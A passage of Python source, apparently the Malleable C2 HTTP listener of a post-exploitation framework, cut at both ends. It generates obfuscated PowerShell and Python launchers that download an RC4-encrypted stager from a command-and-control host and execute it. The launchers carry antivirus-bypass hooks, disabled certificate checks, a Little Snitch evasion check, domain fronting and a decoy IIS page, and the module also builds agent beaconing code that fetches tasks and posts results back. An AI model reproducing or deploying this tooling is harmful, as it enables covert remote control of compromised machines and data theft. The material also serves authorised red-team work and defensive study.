        '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
        '<title>405 - HTTP verb used to access this page is not allowed.</title>',
        '<style type="text/css">',
        '<!--',
        'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
        'fieldset{padding:0 15px 10px 15px;} ',
        'h1{font-size:2.4em;margin:0;color:#FFF;}',
        'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
        'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
        '#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
        'background-color:#555555;}',
        '#content{margin:0 0 0 2%;position:relative;}',
        '.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
        '-->',
        '</style>',
        '</head>',
        '<body>',
        '<div id="header"><h1>Server Error</h1></div>',
        '<div id="content">',
        ' <div class="content-container"><fieldset>',
        '  <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
        '  <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
        ' </fieldset></div>',
        '</div>',
        '</body>',
        '</html>\r\n'
    ])
def index_page(self):
    """
    Returns a default HTTP server page.

    Mimics the stock IIS7 welcome page so the listener root looks benign.
    """
    return '\r\n'.join([
        '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
        '<html xmlns="http://www.w3.org/1999/xhtml">',
        '<head>',
        '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
        '<title>IIS7</title>',
        '<style type="text/css">',
        '<!--',
        'body {',
        ' color:#000000;',
        ' background-color:#B3B3B3;',
        ' margin:0;',
        '}',
        '',
        '#container {',
        ' margin-left:auto;',
        ' margin-right:auto;',
        ' text-align:center;',
        ' }',
        '',
        'a img {',
        ' border:none;',
        '}',
        '',
        '-->',
        '</style>',
        '</head>',
        '<body>',
        '<div id="container">',
        '<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
        '</div>',
        '</body>',
        '</html>',
    ])
def validate_options(self):
"""
Validate all options for this listener.
"""
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
profile_name = self.options["Profile"]["Value"]
profile_data = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
try:
profile = malleable.Profile()
profile.ingest(content=profile_data.data)
# since stager negotiation comms are hard-coded, we can't use any stager transforms - overwriting with defaults
profile.stager.client.verb = "GET"
profile.stager.client.metadata.transforms = []
profile.stager.client.metadata.base64url()
profile.stager.client.metadata.prepend(self.generate_cookie() + "=")
profile.stager.client.metadata.header("Cookie")
profile.stager.server.output.transforms = []
profile.stager.server.output.print_()
if profile.validate():
# store serialized profile for use across sessions
self.options["ProfileSerialized"] = {
"Description" : "Serialized version of the provided Malleable C2 profile.",
"Required" : False,
"Value" : profile._serialize()
}
# for agent compatibility (use post for staging)
self.options["DefaultProfile"] = {
"Description" : "Default communication profile for the agent.",
"Required" : False,
"Value" : profile.post.client.stringify()
}
# grab sleeptime from profile
self.options["DefaultDelay"] = {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : False,
'Value' : int(int(profile.sleeptime)/1000) if hasattr(profile, "sleeptime") else 5
}
# grab jitter from profile
self.options["DefaultJitter"] = {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : float(profile.jitter)/100 if hasattr(profile, "jitter") else 0.0
}
# eliminate troublesome headers
for header in ["Connection"]:
profile.stager.client.headers.pop(header, None)
profile.get.client.headers.pop(header, None)
profile.post.client.headers.pop(header, None)
else:
print(helpers.color("[!] Unable to parse malleable profile: %s" % (profile_name)))
return False
if self.options["CertPath"]["Value"] == "" and self.options["Host"]["Value"].startswith("https"):
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
except malleable.MalleableError as e:
print(helpers.color("[!] Error parsing malleable profile: %s, %s" % (profile_name, e)))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None,
stager=None, bypasses: List[str]=None):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(helpers.color('[!] listeners/template generate_launcher(): no language specified!'))
return None
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
# build profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
profile.stager.client.host = host
profile.stager.client.port = port
profile.stager.client.path = profile.stager.client.random_uri()
if userAgent and userAgent.lower() != 'default':
if userAgent.lower() == 'none' and "User-Agent" in profile.stager.client.headers:
profile.stager.client.headers.pop("User-Agent")
else:
profile.stager.client.headers["User-Agent"] = userAgent
if language.lower().startswith('po'):
# PowerShell
vGPF = helpers.generate_random_script_var_name("GPF")
vGPC = helpers.generate_random_script_var_name("GPC")
vWc = helpers.generate_random_script_var_name("wc")
vData = helpers.generate_random_script_var_name("data")
launcherBase = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
launcherBase = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
for bypass in bypasses:
launcherBase += bypass
if safeChecks.lower() == 'true':
launcherBase += "};"
launcherBase += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# ==== DEFINE BYTE ARRAY CONVERSION ====
launcherBase += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
launcherBase += "'%s');" % (stagingKey)
# ==== DEFINE RC4 ====
launcherBase += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# ==== BUILD AND STORE METADATA ====
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
routingPacketTransformed = profile.stager.client.metadata.transform(routingPacket)
profile.stager.client.store(routingPacketTransformed, profile.stager.client.metadata.terminator)
# ==== BUILD REQUEST ====
launcherBase += helpers.randomize_capitalization("$"+vWc+"=New-Object System.Net.WebClient;")
launcherBase += "$ser="+helpers.obfuscate_call_home_address(profile.stager.client.scheme + "://" + profile.stager.client.netloc)+";$t='"+profile.stager.client.path+profile.stager.client.query+"';"
# ==== HANDLE SSL ====
if profile.stager.client.scheme == 'https':
# allow for self-signed certificates for https connections
launcherBase += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
# ==== CONFIGURE PROXY ====
if proxy and proxy.lower() != 'none':
if proxy.lower() == 'default':
launcherBase += helpers.randomize_capitalization("$"+vWc+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
launcherBase += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
launcherBase += proxy.lower()
launcherBase += helpers.randomize_capitalization("');")
launcherBase += helpers.randomize_capitalization("$"+vWc+".Proxy = $proxy;")
if proxyCreds and proxyCreds.lower() != 'none':
if proxyCreds.lower() == 'default':
launcherBase += helpers.randomize_capitalization("$"+vWc+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
launcherBase += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
else:
usr = username.split('\\')[0]
launcherBase += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');"
launcherBase += helpers.randomize_capitalization("$"+vWc+".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
launcherBase += "$Script:Proxy = $"+vWc+".Proxy;"
# ==== ADD HEADERS ====
for header, value in profile.stager.client.headers.items():
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if header.lower() == "host":
launcherBase += helpers.randomize_capitalization("try{$ig=$"+vWc+".DownloadData($ser)}catch{};")
launcherBase += helpers.randomize_capitalization("$"+vWc+".Headers.Add(")
launcherBase += "\"%s\",\"%s\");" % (header, value)
# ==== SEND REQUEST ====
if profile.stager.client.verb.lower() != "get" or profile.stager.client.body:
launcherBase += helpers.randomize_capitalization("$"+vData+"=$"+vWc+".UploadData($ser+$t,'"+ profile.stager.client.verb +"','"+ profile.stager.client.body +"')\n")
else:
launcherBase += helpers.randomize_capitalization("$"+vData+"=$"+vWc+".DownloadData($ser+$t);")
# ==== INTERPRET RESPONSE ====
if profile.stager.server.output.terminator.type == malleable.Terminator.HEADER:
launcherBase += helpers.randomize_capitalization("$"+vData+"='';for ($i=0;$i -lt $"+vWc+".ResponseHeaders.Count;$i++){")
launcherBase += helpers.randomize_capitalization("if ($"+vData+".ResponseHeaders.GetKey($i) -eq '"+ profile.stager.server.output.terminator.arg +"'){")
launcherBase += helpers.randomize_capitalization("$"+vData+"=$"+vWc+".ResponseHeaders.Get($i);")
launcherBase += helpers.randomize_capitalization("Add-Type -AssemblyName System.Web;$"+vData+"=[System.Web.HttpUtility]::UrlDecode($"+vData+");")
launcherBase += "}}"
elif profile.stager.server.output.terminator.type == malleable.Terminator.PRINT:
launcherBase += ""
else:
launcherBase += ""
launcherBase += profile.stager.server.output.generate_powershell_r("$"+vData)
# ==== EXTRACT IV AND STAGER ====
launcherBase += helpers.randomize_capitalization("$iv=$"+vData+"[0..3];$"+vData+"=$"+vData+"[4..$"+vData+".length];")
# ==== DECRYPT AND EXECUTE STAGER ====
launcherBase += helpers.randomize_capitalization("-join[Char[]](& $R $"+vData+" ($IV+$K))|IEX")
if obfuscate:
launcherBase = data_util.obfuscate(self.mainMenu.installPath, launcherBase, obfuscationCommand=obfuscationCommand)
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(launcherBase, launcher)
else:
return launcherBase
elif language.lower().startswith('py'):
# Python
# ==== HANDLE IMPORTS ====
launcherBase = 'import sys,base64\n'
launcherBase += 'import urllib.request,urllib.parse\n'
# ==== HANDLE SSL ====
if profile.stager.client.scheme == "https":
launcherBase += "import ssl\n"
launcherBase += "if hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context\n"
# ==== SAFE CHECKS ====
if safeChecks and safeChecks.lower() == 'true':
launcherBase += "import re,subprocess\n"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search('Little Snitch', out.decode()):sys.exit()\n"
launcherBase += "server='%s'\n" % (host)
# ==== CONFIGURE PROXY ====
if proxy and proxy.lower() != 'none':
if proxy.lower() == 'default':
launcherBase += "proxy = urllib.request.ProxyHandler()\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'"+proto+"':'"+proxy+"'})\n"
if proxyCreds and proxyCreds != 'none':
if proxyCreds == 'default':
launcherBase += "o = urllib.request.build_opener(proxy)\n"
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"')\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler)\n"
else:
launcherBase += "o = urllib.request.build_opener(proxy)\n"
else:
launcherBase += "o = urllib.request.build_opener()\n"
# install proxy and creds globaly, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o)\n"
# ==== BUILD AND STORE METADATA ====
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
routingPacketTransformed = profile.stager.client.metadata.transform(routingPacket)
profile.stager.client.store(routingPacketTransformed, profile.stager.client.metadata.terminator)
# ==== BUILD REQUEST ====
launcherBase += "vreq=type('vreq',(urllib.request.Request,object),{'get_method':lambda self:self.verb if (hasattr(self,'verb') and self.verb) else urllib.request.Request.get_method(self)})\n"
launcherBase += "req=vreq('%s', %s)\n" % (profile.stager.client.url, profile.stager.client.body)
launcherBase += "req.verb='"+profile.stager.client.verb+"'\n"
# ==== ADD HEADERS ====
for header, value in profile.stager.client.headers.items():
launcherBase += "req.add_header('%s','%s')\n" % (header, value)
# ==== SEND REQUEST ====
launcherBase += "res=urllib.request.urlopen(req)\n"
# ==== INTERPRET RESPONSE ====
if profile.stager.server.output.terminator.type == malleable.Terminator.HEADER:
launcherBase += "head=res.info().dict\n"
launcherBase += "a=head['%s'] if '%s' in head else ''\n" % (profile.stager.server.output.terminator.arg, profile.stager.server.output.terminator.arg)
launcherBase += "a=urllib.parse.unquote(a)\n"
elif profile.stager.server.output.terminator.type == malleable.Terminator.PRINT:
launcherBase += "a=res.read()\n"
else:
launcherBase += "a=''\n"
launcherBase += profile.stager.server.output.generate_python_r("a")
# ==== EXTRACT IV AND STAGER ====
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# ==== DECRYPT STAGER (RC4) ====
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
# ==== EXECUTE STAGER ====
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color("[!] listeners/template generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/template generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_malleable generate_stager(): no language specified!'))
return None
# extract the set options for this instantiated listener
port = listenerOptions['Port']['Value']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
# build profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
profile.stager.client.host = host
profile.stager.client.port = port
profileStr = profile.stager.client.stringify()
# select some random URIs for staging
stage1 = profile.stager.client.random_uri()
stage2 = profile.stager.client.random_uri()
if language.lower() == 'powershell':
# read in the stager base
with open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath)) as f:
stager = f.read()
# Get the random function name generated at install and patch the stager with the proper function name
stager = data_util.keyword_obfuscation(stager)
# patch in custom headers
if profile.stager.client.headers:
headers = ",".join([":".join([k.replace(":","%3A"),v.replace(":","%3A")]) for k,v in profile.stager.client.headers.items()])
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours
if workingHours:
stager = stager.replace("WORKING_HOURS_REPLACE", workingHours)
# patch in the killdate
if killDate:
stager = stager.replace("REPLACE_KILLDATE", killDate)
# patch in the server and key information
stager = stager.replace("REPLACE_SERVER", host)
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("/index.jsp", stage1)
stager = stager.replace("/index.php", stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
# stager = stager.encode('UTF-8')
# randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = data_util.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profileStr,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
if encode:
return base64.b64encode(stager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
return stager
else:
print(helpers.color("[!] listeners/http_malleable generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
return None
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand="", version=''):
"""
Generate the full agent code needed for communications with the listener.
"""
if not language:
print(helpers.color("[!] listeners/http_malleable generate_agent(): no language specified!"))
return None
# build profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
language = language.lower()
delay = listenerOptions["DefaultDelay"]["Value"]
jitter = listenerOptions["DefaultJitter"]["Value"]
lostLimit = listenerOptions["DefaultLostLimit"]["Value"]
killDate = listenerOptions["KillDate"]["Value"]
workingHours = listenerOptions["WorkingHours"]["Value"]
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8')).decode('UTF-8')
profileStr = profile.stager.client.stringify()
if language == 'powershell':
#read in agent code
with open(self.mainMenu.installPath + "/data/agent/agent.ps1") as f:
code = f.read()
# Get the random function name generated at install and patch the stager with the proper function name
code = data_util.keyword_obfuscation(code)
# path in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace("REPLACE_COMMS", commsCode)
# strip out the comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profileStr) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse +'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = data_util.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
# read in the agent base
if version == 'ironpython':
f = open(self.mainMenu.installPath + "/data/agent/ironpython_agent.py")
else:
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profileStr))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print(helpers.color("[!] listeners/http_malleable generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
# extract the set options for this instantiated listener
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
# build profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
profile.get.client.host = host
profile.get.client.port = port
profile.post.client.host = host
profile.post.client.port = port
if language:
if language.lower() == 'powershell':
# PowerShell
vWc = helpers.generate_random_script_var_name("wc")
updateServers = "$Script:ControlServers = @(\"%s\");" % (host)
updateServers += "$Script:ServerIndex = 0;"
# ==== HANDLE SSL ====
if host.startswith('https'):
updateServers += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
# ==== DEFINE GET ====
getTask = "$script:GetTask = {"
getTask += "try {"
getTask += "if ($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {"
# ==== BUILD ROUTING PACKET ====
# meta 'TASKING_REQUEST' : 4
getTask += "$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4;"
getTask += "$RoutingPacket = [System.Text.Encoding]::Default.GetString($RoutingPacket);"
getTask += profile.get.client.metadata.generate_powershell("$RoutingPacket")
# ==== BUILD REQUEST ====
getTask += "$"+vWc+" = New-Object System.Net.WebClient;"
# ==== CONFIGURE PROXY ====
getTask += "$"+vWc+".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();"
getTask += "$"+vWc+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;"
getTask += "if ($Script:Proxy) {"
getTask += "$"+vWc+".Proxy = $Script:Proxy;"
getTask += "}"
# ==== CHOOSE URI ====
getTask += "$taskURI = " + ",".join(["'%s'" % u for u in (profile.get.client.uris if profile.get.client.uris else ["/"])]) + " | Get-Random;"
# ==== ADD PARAMETERS ====
first = True
for parameter, value in profile.get.client.parameters.items():
getTask += "$taskURI += '"+("?" if first else "&")+"';"
first = False
getTask += "$taskURI += '"+parameter+"="+value+"';"
if profile.get.client.metadata.terminator.type == malleable.Terminator.PARAMETER:
getTask += "$taskURI += '"+("?" if first else "&")+"';"
first = False
getTask += "$taskURI += '"+profile.get.client.metadata.terminator.arg+"=' + $RoutingPacket;"
if profile.get.client.metadata.terminator.type == malleable.Terminator.URIAPPEND:
getTask += "$taskURI += $RoutingPacket;"
# ==== ADD HEADERS ====
for header, value in profile.get.client.headers.items():
getTask += "$"+vWc+".Headers.Add('"+header+"', '"+value+"');"
if profile.get.client.metadata.terminator.type == malleable.Terminator.HEADER:
getTask += "$"+vWc+".Headers.Add('"+profile.get.client.metadata.terminator.arg+"', $RoutingPacket);"
# ==== ADD BODY ====
if profile.get.client.metadata.terminator.type == malleable.Terminator.PRINT:
getTask += "$body = $RoutingPacket;"
else:
getTask += "$body = '"+profile.get.client.body+"';"
# ==== SEND REQUEST ====
if profile.get.client.verb.lower() != "get" or profile.get.client.body or profile.get.client.metadata.terminator.type == malleable.Terminator.PRINT:
getTask += "$result = $"+vWc+".UploadData($Script:ControlServers[$Script:ServerIndex] + $taskURI, '"+ profile.get.client.verb +"', [System.Text.Encoding]::Default.GetBytes('"+ profile.get.client.body +"'));"
else:
getTask += "$result = $"+vWc+".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI);"
# ==== EXTRACT RESULTS ====
if profile.get.server.output.terminator.type == malleable.Terminator.HEADER:
getTask += "$data = $"+vWc+".responseHeaders.get('"+profile.get.server.output.terminator.arg+"');"
getTask += "Add-Type -AssemblyName System.Web; $data = [System.Web.HttpUtility]::UrlDecode($data);"
elif profile.get.server.output.terminator.type == malleable.Terminator.PRINT:
getTask += "$data = $result;"
getTask += "$data = [System.Text.Encoding]::Default.GetString($data);"
# ==== INTERPRET RESULTS ====
getTask += profile.get.server.output.generate_powershell_r("$data")
getTask += "$data = [System.Text.Encoding]::Default.GetBytes($data);"
# ==== RETURN RESULTS ====
getTask += "$data;"
getTask += "}"
# ==== HANDLE ERROR ====
getTask += "} catch [Net.WebException] {"
getTask += "$script:MissedCheckins += 1;"
getTask += "if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {"
getTask += "Start-Negotiate -S '$ser' -SK $SK -UA $ua;"
getTask += "}"
getTask += "}"
getTask += "};"
# ==== DEFINE POST ====
sendMessage = "$script:SendMessage = {"
sendMessage += "param($Packets);"
sendMessage += "if ($Packets) {"
# note: id container not used, only output
# ==== BUILD ROUTING PACKET ====
# meta 'RESULT_POST' : 5
sendMessage += "$EncBytes = Encrypt-Bytes $Packets;"
sendMessage += "$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5;"
sendMessage += "$RoutingPacket = [System.Text.Encoding]::Default.GetString($RoutingPacket);"
sendMessage += profile.post.client.output.generate_powershell("$RoutingPacket")
# ==== BUILD REQUEST ====
sendMessage += "if ($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {"
sendMessage += "$"+vWc+" = New-Object System.Net.WebClient;"
# ==== CONFIGURE PROXY ====
sendMessage += "$"+vWc+".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();"
sendMessage += "$"+vWc+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;"
sendMessage += "if ($Script:Proxy) {"
sendMessage += "$"+vWc+".Proxy = $Script:Proxy;"
sendMessage += "}"
# ==== CHOOSE URI ====
sendMessage += "$taskURI = " + ",".join(["'%s'" % u for u in (profile.post.client.uris if profile.post.client.uris else ["/"])]) + " | Get-Random;"
# ==== ADD PARAMETERS ====
first = True
for parameter, value in profile.post.client.parameters.items():
sendMessage += "$taskURI += '"+("?" if first else "&")+"';"
first = False
sendMessage += "$taskURI += '"+parameter+"="+value+"';"
if profile.post.client.output.terminator.type == malleable.Terminator.PARAMETER:
sendMessage += "$taskURI += '"+("?" if first else "&")+"';"
first = False
sendMessage += "$taskURI += '"+profile.post.client.output.terminator.arg+"=' + $RoutingPacket;"
if profile.post.client.output.terminator.type == malleable.Terminator.URIAPPEND:
sendMessage += "$taskURI += $RoutingPacket;"
# ==== ADD HEADERS ====
for header, value in profile.post.client.headers.items():
sendMessage += "$"+vWc+".Headers.Add('"+header+"', '"+value+"');"
if profile.post.client.output.terminator.type == malleable.Terminator.HEADER:
sendMessage += "$"+vWc+".Headers.Add('"+profile.post.client.output.terminator.arg+"', $RoutingPacket);"
# ==== ADD BODY ====
if profile.post.client.output.terminator.type == malleable.Terminator.PRINT:
sendMessage += "$body = $RoutingPacket;"
else:
sendMessage += "$body = '"+profile.post.client.body+"';"
# ==== SEND REQUEST ====
sendMessage += "try {"
if profile.post.client.verb.lower() != "get" or profile.post.client.body or profile.post.client.output.terminator.type == malleable.Terminator.PRINT:
sendMessage += "$result = $"+vWc+".UploadData($Script:ControlServers[$Script:ServerIndex] + $taskURI, '"+ profile.post.client.verb.upper() +"', [System.Text.Encoding]::Default.GetBytes($body));"
else:
sendMessage += "$result = $"+vWc+".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI);"
# ==== HANDLE ERROR ====
sendMessage += "} catch [System.Net.WebException] {"
sendMessage += "if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {"
sendMessage += "Start-Negotiate -S '$ser' -SK $SK -UA $ua;"
sendMessage += "}"
sendMessage += "}"
sendMessage += "}"
sendMessage += "}"
sendMessage += "};"
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
# Python
updateServers = "server = '%s'\n" % (host)
# ==== HANDLE SSL ====
if host.startswith("https"):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None\n"
sendMessage = "def send_message(packets=None):\n"
sendMessage += " global missedCheckins\n"
sendMessage += " global server\n"
sendMessage += " global headers\n"
sendMessage += " global taskURIs\n"
sendMessage += " vreq = type('vreq', (urllib.request.Request, object), {'get_method':lambda self:self.verb if (hasattr(self, 'verb') and self.verb) else urllib.request.Request.get_method(self)})\n"
# ==== BUILD POST ====
sendMessage += " if packets:\n"
# ==== BUILD ROUTING PACKET ====
sendMessage += " encData = aes_encrypt_then_hmac(key, packets)\n"
sendMessage += " routingPacket = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)\n"
sendMessage += "\n".join([" " + _ for _ in profile.post.client.output.generate_python("routingPacket").split("\n")]) + "\n"
# ==== CHOOSE URI ====
sendMessage += " taskUri = random.sample("+ str(profile.post.client.uris) +", 1)[0]\n"
